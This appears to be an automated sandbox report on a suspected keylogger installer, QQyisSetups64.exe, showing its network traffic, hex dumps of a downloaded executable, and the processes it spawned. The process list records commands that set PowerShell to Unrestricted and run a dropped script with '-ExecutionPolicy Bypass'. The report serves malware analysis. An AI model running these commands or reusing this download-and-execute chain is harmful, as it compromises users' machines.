Dec 29, 2024 11:18:35.011354923 CET	398	OUT	GET /safe/instcomp.htm?soft=1000&status=107&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:35.568841934 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:35 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:35.569289923 CET	235	OUT	GET /safe/instcomp.htm?soft=425&status=1&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=0&downrate=0&downlen=0 HTTP/1.1 Host: s.360.cn Connection: Keep-Alive Cache-Control: no-cache
Dec 29, 2024 11:18:36.120131969 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:35 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:38.581141949 CET	385	OUT	GET /safe/instcomp.htm?soft=1000&status=10&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:39.146619081 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:38 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:39.183748007 CET	239	OUT	GET /safe/instcomp.htm?soft=425&status=19&mid=d1e14e22504ef0686661740b830978f1&from=safefinal_new&ver=13.0.0.1231&vv=10&appkey=&usetime=4140&downrate=0&downlen=0 HTTP/1.1 Host: s.360.cn Connection: Keep-Alive Cache-Control: no-cache
Dec 29, 2024 11:18:39.747613907 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:39 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49748	171.8.167.90	80	1464	C:\Users\user\Downloads\inst.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 11:18:33.682585955 CET	384	OUT	GET /safe/instcomp.htm?soft=1000&status=1&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:35.286823034 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:35 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:35.288252115 CET	384	OUT	GET /safe/instcomp.htm?soft=1000&status=8&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:35.850770950 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:35 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes
Dec 29, 2024 11:18:38.584850073 CET	398	OUT	GET /safe/instcomp.htm?soft=1000&status=129&m=d1e14e22504ef0686661740b830978f1&from=safefinal_new&vv=10&installed=0&ver=13.0.0.1231&pid= HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: s.360.cn Connection: Keep-Alive
Dec 29, 2024 11:18:39.654844999 CET	240	IN	HTTP/1.1 200 OK Server: openresty/1.15.8.2 Date: Sun, 29 Dec 2024 10:18:39 GMT Content-Type: text/html Content-Length: 0 Last-Modified: Tue, 23 Jul 2019 07:36:33 GMT Connection: keep-alive ETag: "5d36b901-0" Accept-Ranges: bytes

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49756	39.156.85.200	80	1464	C:\Users\user\Downloads\inst.exe

Timestamp	Bytes transferred	Direction	Data
Dec 29, 2024 11:18:35.998892069 CET	202	OUT	GET /360safe/h_inst.cab?rd=10788264 HTTP/1.1 Accept: / User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Host: pinst.360.cn Connection: Close Cache-Control: no-cache
Dec 29, 2024 11:18:37.610970974 CET	228	IN	HTTP/1.1 200 OK Server: nginx/1.2.6.10 Date: Sun, 29 Dec 2024 10:18:37 GMT Content-Type: application/octet-stream Content-Length: 648 Last-Modified: Fri, 27 Dec 2024 02:49:32 GMT Connection: close Accept-Ranges: bytes
Dec 29, 2024 11:18:37.611284971 CET	648	IN	Data Raw: 4d 53 43 46 00 00 00 00 88 02 00 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 00 00 00 00 46 00 00 00 01 00 01 00 56 03 00 00 00 00 00 00 00 00 9b 59 76 54 20 00 73 65 74 75 70 2e 69 6e 69 00 9c 0c 0f 43 3a 02 56 03 43 4b 65 51 Data Ascii: MSCF,FVYvT setup.iniC:VCKeQA7?jQO3AB'i3N:t0.GnDK`0g{U*`ieY5U}v^}{-rOU{d~_'v;,EY&.]]-g_eqq[+W

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49708	47.79.48.211	443	7736	C:\Users\user\Desktop\QQyisSetups64.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-29 10:18:17 UTC	132	OUT	GET /inst.exe HTTP/1.1 User-Agent: URLDownloader Host: bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com Cache-Control: no-cache
2024-12-29 10:18:18 UTC	563	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 29 Dec 2024 10:18:17 GMT Content-Type: application/octet-stream Content-Length: 4118496 Connection: close x-oss-request-id: 677121E9E173EA33307C04AF Accept-Ranges: bytes ETag: "AAA0F14BDFE3777EEE342C27DE409E6D" Last-Modified: Sat, 28 Dec 2024 06:31:15 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 13828654626470641508 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: qqDxS9/jd37uNCwn3kCebQ== x-oss-server-time: 11
2024-12-29 10:18:18 UTC	15821	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 21 c5 b9 d1 65 a4 d7 82 65 a4 d7 82 65 a4 d7 82 d8 eb 41 82 61 a4 d7 82 6c dc 42 82 79 a4 d7 82 42 62 b9 82 64 a4 d7 82 6c dc 5e 82 73 a4 d7 82 7b f6 53 82 61 a4 d7 82 42 62 ba 82 66 a4 d7 82 42 62 ac 82 40 a4 d7 82 65 a4 d6 82 b7 a5 d7 82 6c dc 54 82 d2 a4 d7 82 6c dc 53 82 ca a4 d7 82 7b f6 43 82 64 a4 d7 82 6c dc 46 82 64 a4 d7 82 52 69 63 68 65 a4 d7 82 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$!eeeAalByBbdl^s{SaBbfBb@elTlS{CdlFdRiche
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: c8 75 08 c7 44 24 10 fe ff 00 00 0f b7 74 24 10 8d 34 b6 03 f6 03 f6 03 f6 8b c6 e8 23 f3 ff ff 89 44 24 18 85 c0 75 19 68 68 cc 4c 00 50 50 ba 68 cc 4c 00 e8 4a 37 00 00 83 c4 0c e9 62 01 00 00 85 f6 74 24 8b 4c 24 34 8b 54 24 30 56 50 51 52 8d 7c 24 48 e8 e9 f9 ff ff 83 c4 10 85 c0 0f 84 3e 01 00 00 8b 44 24 18 01 b5 b0 00 00 00 83 7c 24 14 00 8b 74 24 10 74 2b 33 ff 33 d2 8b c8 66 3b fe 73 20 81 39 49 4e 49 54 75 06 80 79 04 00 74 0b 42 83 c1 28 66 3b d6 72 e9 eb 07 c6 85 9e 00 00 00 01 8b 4c 24 24 8b 54 24 20 51 e8 d0 01 00 00 8b f0 83 c4 04 89 74 24 20 85 f6 0f 84 c3 00 00 00 6a 0a 56 8d 44 24 40 e8 03 01 00 00 83 c4 08 85 c0 0f 84 ac 00 00 00 8b 40 04 85 c0 0f 89 a1 00 00 00 25 ff ff ff 7f 03 c6 68 60 03 00 00 50 8d 44 24 40 e8 d7 00 00 00 83 c4 08 Data Ascii: uD$t$4#D$uhhLPPhLJ7bt$L$4T$0VPQR\|$H>D$\|$t$t+33f;s 9INITuytB(f;rL$$T$ Qt$ jVD$@@%h`PD$@
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 20 73 4b 85 db 74 47 b9 20 00 00 00 2b cf 89 4c 24 0c 8b 4c 24 14 2b ce 55 8d 14 9e 89 4c 24 0c eb 05 90 8b 4c 24 0c 8b 74 11 fc 83 ea 04 8b ee 8b cf d3 ed 4b 0b e8 89 2a 85 ff 74 0a 8b 4c 24 10 d3 e6 8b c6 eb 02 33 c0 85 db 75 d6 5d 5e 5b 83 c4 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 38 06 00 00 55 8b ac 24 4c 06 00 00 57 8b f8 8b 84 24 54 06 00 00 85 c0 0f 84 d4 02 00 00 48 83 3c 87 00 75 07 8b c8 48 85 c9 75 f3 53 8d 58 01 89 5c 24 14 85 db 0f 84 b5 02 00 00 8b 4c 9f fc 33 c0 85 c9 74 08 40 d1 e9 83 f8 20 72 f4 56 be 20 00 00 00 2b f0 89 74 24 2c 8b cb 8d 84 24 3c 02 00 00 eb 09 8d a4 24 00 00 00 00 8b ff c7 00 00 00 00 00 83 c0 04 83 e9 01 75 f2 8b 84 24 54 06 00 00 55 8d 8c 24 40 02 00 00 e8 ae fe ff ff 89 84 ac 40 02 00 00 53 8b c7 Data Ascii: sKtG +L$L$+UL$L$tK*tL$3u]^[8U$LW$TH<uHuSX\$L3t@ rV +t$,$<$u$TU$@@S
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 4d 00 8d 55 d8 52 c7 45 d8 50 20 4c 00 e8 77 7c 07 00 8b 45 08 8b 4d ec 89 45 e4 40 89 65 f0 50 c6 45 fc 02 e8 5a 03 00 00 89 45 08 b8 ff c9 40 00 c3 8b 7d ec 8b 75 e4 8b 5d 0c 85 db 76 20 83 7f 18 10 72 05 8b 47 04 eb 03 8d 47 04 8b 4d 08 53 50 8d 46 01 50 51 e8 a1 7b 07 00 83 c4 10 83 7f 18 10 72 0c 8b 57 04 52 e8 03 7b 07 00 83 c4 04 8b 4d 08 8d 47 04 c6 00 00 89 08 89 77 18 89 5f 14 83 fe 10 72 02 8b c1 c6 04 18 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 75 ec 83 7e 18 10 72 0c 8b 46 04 50 e8 be 7a 07 00 83 c4 04 6a 00 c7 46 18 0f 00 00 00 c7 46 14 00 00 00 00 6a 00 c6 46 04 00 e8 b8 7b 07 00 cc cc 56 57 8b 7c 24 0c 85 ff 74 2c 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 3b fa 72 17 83 fe 10 72 02 8b 00 8b 49 14 03 c8 3b Data Ascii: MUREP Lw\|EME@ePEZE@}u]v rGGMSPFPQ{rWR{MGw_rMdY_^[]u~rFPzjFFjF{VW\|$t,qAr;rrI;
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 8d 74 24 2c e8 ba 00 00 00 8d 44 24 0c e8 81 04 00 00 eb 3e 53 8d 4c 24 10 e8 35 f8 ff ff 83 c4 04 8d 74 24 2c e8 99 00 00 00 c7 44 24 48 ff ff ff ff 8b 44 24 0c 83 c0 f0 83 ca ff 8d 48 0c f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 b8 01 00 00 00 8b 4c 24 40 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 06 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 04 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 08 8b c6 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 46 08 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 46 04 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 Data Ascii: t$,D$>SL$5t$,D$HD$HJPBL$@dY_^]NPNNPNFNPNFFHJPBFHJPB
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 89 9c 24 74 04 00 00 68 02 00 00 80 89 5c 24 34 ff 15 40 e0 4b 00 3b c3 0f 85 bc 00 00 00 8b 7c 24 20 33 c0 89 7c 24 34 89 5c 24 38 89 44 24 2c 8d 49 00 8d 54 24 3c 52 53 53 53 8d 4c 24 2c 51 8d 94 24 60 02 00 00 52 50 be 04 01 00 00 57 89 74 24 3c ff 15 28 e0 4b 00 85 c0 0f 85 44 01 00 00 89 5c 24 14 89 5c 24 18 8d 44 24 28 50 6a 01 53 8d 8c 24 58 02 00 00 51 c6 84 24 74 04 00 00 01 57 89 5c 24 3c ff 15 40 e0 4b 00 3b c3 75 51 8b 6c 24 28 68 88 e6 4c 00 8d 54 24 18 89 74 24 20 52 8d 7c 24 24 8d 74 24 4c 89 6c 24 1c 89 5c 24 20 e8 6c db ff ff 85 c0 74 36 88 9c 24 64 04 00 00 3b eb 74 0b 55 ff 15 3c e0 4b 00 89 5c 24 14 89 5c 24 18 e9 b3 00 00 00 33 c0 e9 ef 00 00 00 88 9c 24 64 04 00 00 89 5c 24 18 e9 9c 00 00 00 8d 44 24 44 50 e8 87 64 07 00 83 c4 04 83 Data Ascii: $th\$4@K;\|$ 3\|$4\$8D$,IT$<RSSSL$,Q$`RPWt$<(KD\$\$D$(PjS$XQ$tW\$<@K;uQl$(hLT$t$ R\|$$t$Ll$\$ lt6$d;tU<K\$\$3$d\$D$DPd
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 00 ff 74 24 14 ff 31 ff 15 44 e0 4b 00 c2 08 00 55 8b ec 83 7d 0c 00 56 8b f1 75 05 6a 0d 58 eb 21 ff 75 0c ff 15 78 e3 4b 00 8d 44 00 02 50 ff 75 0c ff 75 10 6a 00 ff 75 08 ff 36 ff 15 44 e0 4b 00 5e 5d c2 0c 00 53 56 8b 74 24 10 8b d9 85 f6 75 05 6a 0d 58 eb 2d 57 33 ff 56 ff 15 78 e3 4b 00 40 8d 0c 00 03 f1 03 f9 83 f8 01 75 ec 57 ff 74 24 18 6a 07 6a 00 ff 74 24 20 ff 33 ff 15 44 e0 4b 00 5f 5e 5b c2 08 00 ff 74 24 08 ff 74 24 08 ff 15 68 e3 4b 00 f7 d8 1a c0 fe c0 c3 b8 09 00 02 80 c2 04 00 8b 01 6a 27 59 66 3b 08 75 13 50 ff 15 64 e5 4b 00 6a 27 59 66 3b 08 74 04 33 c0 40 c3 33 c0 c3 8b 44 24 04 83 f8 64 56 8b f1 7d 05 b8 e8 03 00 00 83 26 00 6a 02 50 89 46 04 e8 88 fc ff ff 59 59 89 46 08 85 c0 74 05 33 c9 66 89 08 8b c6 5e c2 04 00 ff 71 08 ff 15 Data Ascii: t$1DKU}VujX!uxKDPuuju6DK^]SVt$ujX-W3VxK@uWt$jjt$ 3DK_^[t$t$hKj'Yf;uPdKj'Yf;t3@3D$dV}&jPFYYFt3f^q
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 00 56 8b f1 8b 0e 85 c9 74 08 e8 dc fd ff ff 83 26 00 5e c3 55 8b ec 83 7d 08 00 56 57 8b f9 75 0a 68 57 00 07 80 e8 b8 15 ff ff ff 75 0c ff 75 08 e8 fb a1 06 00 59 59 8b f0 56 8b cf e8 f1 04 ff ff ff 75 0c 8d 4e 01 ff 75 08 51 50 e8 27 a4 06 00 83 c4 10 56 8b cf e8 06 05 ff ff 5f 5e 5d c2 08 00 56 8b f1 6a 00 6a 00 8d 4e 14 e8 70 ad ff ff 85 c0 75 0d 6a 0e ff 15 64 e3 4b 00 83 c8 ff eb 2d 56 83 c6 08 56 68 c0 cd 4e 00 e8 18 cc ff ff ff 74 24 0c 68 6b a9 41 00 ff 74 24 10 68 81 00 00 00 ff 35 34 cd 4e 00 ff 15 84 e5 4b 00 5e c2 08 00 e9 48 ff ff ff 6a 00 b8 e9 40 4b 00 e8 8f 89 06 00 8b 45 08 83 65 fc 00 85 c0 74 04 8b 00 eb 02 33 c0 8b 11 50 51 ff 52 0c 8b 4d 08 8b f0 85 c9 74 05 e8 00 fd ff ff 8b c6 e8 3a 8a 06 00 c2 04 00 6a 00 b8 0c 41 4b 00 e8 53 89 Data Ascii: Vt&^U}VWuhWuuYYVuNuQP'V_^]VjjNpujdK-VVhNt$hkAt$h54NK^Hj@KEet3PQRMt:jAKS
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: ff 44 0a 35 3e c7 85 a4 fd ff ff d5 cd b4 bc c7 85 a8 fd ff ff a8 ce ea 72 c7 85 ac fd ff ff bb 84 64 fa c7 85 b0 fd ff ff ae 12 66 8d c7 85 b4 fd ff ff 47 6f 3c bf c7 85 b8 fd ff ff 63 e4 9b d2 c7 85 bc fd ff ff 9e 5d 2f 54 c7 85 c0 fd ff ff 1b 77 c2 ae c7 85 c4 fd ff ff 70 63 4e f6 c7 85 c8 fd ff ff 8d 0d 0e 74 c7 85 cc fd ff ff 57 13 5b e7 c7 85 d0 fd ff ff 71 16 72 f8 c7 85 d4 fd ff ff 5d 7d 53 af c7 85 d8 fd ff ff 08 cb 40 40 c7 85 dc fd ff ff cc e2 b4 4e c7 85 e0 fd ff ff 6a 46 d2 34 c7 85 e4 fd ff ff 84 af 15 01 c7 85 e8 fd ff ff 28 04 b0 e1 c7 85 ec fd ff ff 1d 3a 98 95 c7 85 f0 fd ff ff b4 9f b8 06 c7 85 f4 fd ff ff 48 a0 6e ce c7 85 f8 fd ff ff 82 3b 3f 6f c7 85 fc fd ff ff 82 ab 20 35 c7 85 00 fe ff ff 4b 1d 1a 01 c7 85 04 fe ff ff f8 27 72 27 Data Ascii: D5>rdfGo<c]/TwpcNtW[qr]}S@@NjF4(:Hn;?o 5K'r'
2024-12-29 10:18:18 UTC	16384	IN	Data Raw: 33 ff 39 be f0 10 00 00 0f 84 d4 01 00 00 8b 45 10 8d 4e 08 89 86 04 11 00 00 89 be f4 10 00 00 e8 98 cc ff ff 8d 9e cc 10 00 00 8b cb 89 5d f0 e8 bc 99 ff ff ff 75 0c 89 7e 4c 8d 7e 58 8b cf e8 15 92 ff ff 57 e8 bb 94 ff ff c7 04 24 5c 11 4c 00 ff 37 e8 0d 02 06 00 f7 d8 59 1b c0 59 40 8d 4d d0 89 86 f8 10 00 00 e8 cc d3 ff ff 83 65 fc 00 8d 4d e8 e8 c0 d3 ff ff 8d 45 e8 50 8d 45 d0 50 ff 75 08 c6 45 fc 01 e8 c3 94 ff ff 83 c4 0c 8b cf e8 d7 90 ff ff 83 f8 03 0f 82 20 01 00 00 8d 4d d0 e8 c6 90 ff ff 83 f8 02 0f 82 0f 01 00 00 8d 4d e8 e8 b5 90 ff ff 83 f8 02 0f 82 fe 00 00 00 8d 7e 60 8b 07 33 c9 66 89 08 8d 4d d8 e8 48 d3 ff ff 8d 4d e0 c6 45 fc 02 e8 3c d3 ff ff bb a6 3d 42 00 eb 45 8b cf e8 80 90 ff ff 85 c0 74 71 57 8d 4d e8 e8 5e 91 ff ff ff 75 e0 Data Ascii: 39EN]u~L~XW$\L7YY@MeMEPEPuE MM~`3fMHME<=BEtqWM^u

Target ID:	3
Start time:	05:18:09
Start date:	29/12/2024
Path:	C:\Users\user\Desktop\QQyisSetups64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\QQyisSetups64.exe"
Imagebase:	0x400000
File size:	5'289'240 bytes
MD5 hash:	B4F00FBA3327488D4CB6FD36B2D567C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000002.1456396278.0000000000403000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000000.1279423862.00000000006F9000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000000.1279062658.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:18:12
Start date:	29/12/2024
Path:	C:\Users\user\AppData\Roaming\QQyisSetups64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QQyisSetups64.exe"
Imagebase:	0x400000
File size:	5'289'240 bytes
MD5 hash:	B4F00FBA3327488D4CB6FD36B2D567C6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:18:20
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	05:18:20
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:18:20
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	05:18:21
Start date:	29/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	05:18:21
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Imagebase:	0xdd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	05:18:21
Start date:	29/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Imagebase:	0xdd0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:18:25
Start date:	29/12/2024
Path:	C:\Users\user\Downloads\inst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Downloads\inst.exe
Imagebase:	0xa70000
File size:	4'118'496 bytes
MD5 hash:	AAA0F14BDFE3777EEE342C27DE409E6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 17%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	05:18:25
Start date:	29/12/2024
Path:	C:\Users\user\Downloads\inst.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Downloads\inst.exe
Imagebase:	0xa70000
File size:	4'118'496 bytes
MD5 hash:	AAA0F14BDFE3777EEE342C27DE409E6D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	06:58:14
Start date:	29/12/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff7b4ee0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.1%
Dynamic/Decrypted Code Coverage:	99.8%
Signature Coverage:	4.8%
Total number of Nodes:	1653
Total number of Limit Nodes:	5

Executed Functions

Function 02860032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(?), ref: 028604AE
VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028604DE

Strings

fo, xrefs: 0286022C
st, xrefs: 028601AD
oc, xrefs: 02860154
ucti, xrefs: 028601BE
Li, xrefs: 0286010C
iv, xrefs: 02860212
Rt, xrefs: 02860233
Via, xrefs: 02860312
Vi, xrefs: 0286012C
a, xrefs: 02860103
tu, xrefs: 02860166
F, xrefs: 0286018C
a, xrefs: 0286013E
a, xrefs: 0286016D
A, xrefs: 02860147
tu, xrefs: 02860137
A, xrefs: 02860244
p, xrefs: 028600F7
Lo, xrefs: 028600FC
ctio, xrefs: 0286026B
o, xrefs: 028601C9
a, xrefs: 0286011C
mI, xrefs: 02860221
ushI, xrefs: 0286019B
P, xrefs: 02860176
G, xrefs: 02860205
S, xrefs: 028600E7
otec, xrefs: 0286017F
tNat, xrefs: 0286020A
